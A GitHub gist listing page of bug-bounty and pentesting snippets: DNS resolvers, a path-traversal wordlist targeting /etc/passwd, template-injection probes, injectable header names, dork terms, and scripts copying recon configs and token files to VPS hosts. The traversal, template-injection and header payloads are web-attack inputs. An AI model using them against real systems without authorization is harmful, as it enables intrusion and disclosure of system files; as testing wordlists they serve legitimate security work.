Skip to content

Instantly share code, notes, and snippets.

View six2dez's full-sized avatar
🐧
Hack 'em all

six2dez six2dez

🐧
Hack 'em all
View GitHub Profile
@six2dez
six2dez / trusted_resolvers.txt
Last active April 22, 2024 09:43
trusted_resolvers.txt
# Google
8.8.8.8
8.8.4.4
# Cisco OpenDNS
208.67.222.222
208.67.220.220
# Comodo Secure DNS
8.26.56.26
8.20.247.20
# CIRA Canadian Shield
@six2dez
six2dez / lfi_wordlist.txt
Last active June 2, 2021 04:22
lfi_wordlist.txt
/etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd
@six2dez
six2dez / ssti.txt
Created May 17, 2021 11:47
ssti.txt
ssti{{7*7}}
ssti[[7*7]]
ssti{{4+'9'}}
ssti<%= 7 * 7 %>
ssti${7*7}
ssti${{7*7}}
ssti@(40+9)
ssti#{7*7}
ssti#{ 7 * 7 }
ssti<%=%207%20*%207%20%>
@six2dez
six2dez / headers_inject.txt
Last active December 16, 2021 15:38
headers_inject.txt
Base-Url
CF-Connecting_IP
Client-IP
Contact
Forwarded
From
Http-Url
Proxy-Host
Proxy-Url
Real-Ip
@six2dez
six2dez / copyconfig.sh
Last active June 29, 2021 11:18
copy useful configuration files to VPS
#!/bin/bash
# Copying configurations to VPS
# ./copyconfig.sh X.X.X.X
rsync -vr ~/Tools/authorized_keys root@$1:/root/.ssh/authorized_keys
ssh root@$1 'mkdir -p /root/.config/amass/ /root/Tools/ /root/.config/subfinder/ /root/.config/notify/'
rsync -vr ~/.config/amass/config.ini root@$1:/root/.config/amass/config.ini
rsync -vr ~/Tools/h8mail_config.ini root@$1:/root/Tools/h8mail_config.ini
rsync -vr ~/.config/subfinder/config.yaml root@$1:/root/.config/subfinder/config.yaml
@six2dez
six2dez / custom_udork.txt
Created July 27, 2021 09:45
custom_udork.txt
"PHP Error"
"PHP Parse error"
"PHP Warning"
boot.ini
ext:action
ext:backup
ext:bak
ext:bkf
ext:bkp
ext:cfg
@six2dez
six2dez / axiom_config.sh
Last active May 9, 2023 07:32
axiom_config.sh
#!/bin/bash
# Use this as initial axiom's script on reconftw.cfg file to copy config files to the fleet
axiom-exec 'mkdir -p /home/op/.config/amass/ /home/op/Tools/ /home/op/.config/subfinder/ /home/op/.config/notify/'
axiom-scp ~/.config/amass/config.ini '*':/home/op/.config/amass/config.ini
axiom-scp ~/Tools/h8mail_config.ini '*':/home/op/Tools/h8mail_config.ini
axiom-scp ~/Tools/.github_tokens '*':/home/op/Tools/.github_tokens
axiom-scp ~/.config/notify/notify.conf '*':/home/op/.config/notify/notify.conf
axiom-scp ~/Tools/.gitlab_tokens '*':/home/op/Tools/.gitlab_tokens
@six2dez
six2dez / tls_ports.txt
Last active May 17, 2022 11:50
List of TLS services and ports according to IANA specification and other sources
21,22,25,80,110,135,143,261,271,324,443,448,465,541,563,614,631,636,664,684,695,832,853,854,990,993,989,990,992,993,994,995,1129,1131,1184,2083,2087,2089,2096,2221,2252,2376,2381,2478,2479,2482,2484,2679,2762,3077,3078,3183,3191,3220,3269,3306,3389,3410,3424,3471,3496,3509,3529,3539,3535,3660,36611,3713,3747,3766,3864,3885,3995,3896,4031,4036,4062,4064,4081,4083,4116,4335,4336,4536,4590,4740,4843,4843,4849,5432,5443,5007,5061,5321,5349,5671,5783,5868,5900,5986,5989,5990,6209,6251,6443,6513,6514,6619,6697,6771,6697,7202,7443,7673,7674,7677,7775,8080,8243,8443,8991,8989,9089,9295,9318,9443,9444,9614,9802,10161,10162,11751,12013,12109,14143,15002,16995,41230,16993,20003
@six2dez
six2dez / how to use
Created August 13, 2022 15:20 — forked from carlware/how to use
proxychains and tor (change ip ~10 seconds)
# install
sudo apt-get install proxychains
sudo apt-get install tor
# then update the files /etc/proxychains.conf and /etc/tor/torrc with the given config
# restart tor server
sudo service restart tor
1
2
3
4
5
6
7
8
9
10